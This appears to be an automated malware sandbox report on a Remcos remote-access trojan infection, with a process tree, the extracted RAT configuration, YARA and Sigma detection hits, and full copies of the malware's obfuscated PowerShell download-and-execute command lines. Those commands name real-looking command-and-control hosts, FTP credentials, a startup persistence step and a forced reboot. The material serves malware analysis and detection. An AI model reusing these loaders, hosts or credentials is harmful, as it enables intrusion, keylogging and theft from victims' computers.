    • powershell.exe (PID: 7804 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "janbours92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTATIONOFWEALTH", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-DGYVFK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.3336616303.00000000012F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000014.00000002.2362918816.0000000001048000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 33 entries
              SourceRuleDescriptionAuthorStrings
              27.2.powershell.exe.1c7286e7ed8.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                27.2.powershell.exe.1c7286e7ed8.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  27.2.powershell.exe.1c7286e7ed8.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    27.2.powershell.exe.1c7286e7ed8.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x690b8:$a1: Remcos restarted by watchdog!
                    • 0x69630:$a3: %02i:%02i:%02i:%03i
                    27.2.powershell.exe.1c7286e7ed8.1.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6317c:$str_b2: Executing file:
                    • 0x641fc:$str_b3: GetDirectListeningPort
                    • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x63d28:$str_b7: \update.vbs
                    • 0x631a4:$str_b9: Downloaded file:
                    • 0x63190:$str_b10: Downloading file:
                    • 0x63234:$str_b12: Failed to upload file:
                    • 0x641c4:$str_b13: StartForward
                    • 0x641e4:$str_b14: StopForward
                    • 0x63c80:$str_b15: fso.DeleteFile "
                    • 0x63c14:$str_b16: On Error Resume Next
                    • 0x63cb0:$str_b17: fso.DeleteFolder "
                    • 0x63224:$str_b18: Uploaded file:
                    • 0x631e4:$str_b19: Unable to delete:
                    • 0x63c48:$str_b20: while fso.FileExists("
                    • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 44 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi64_1436.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 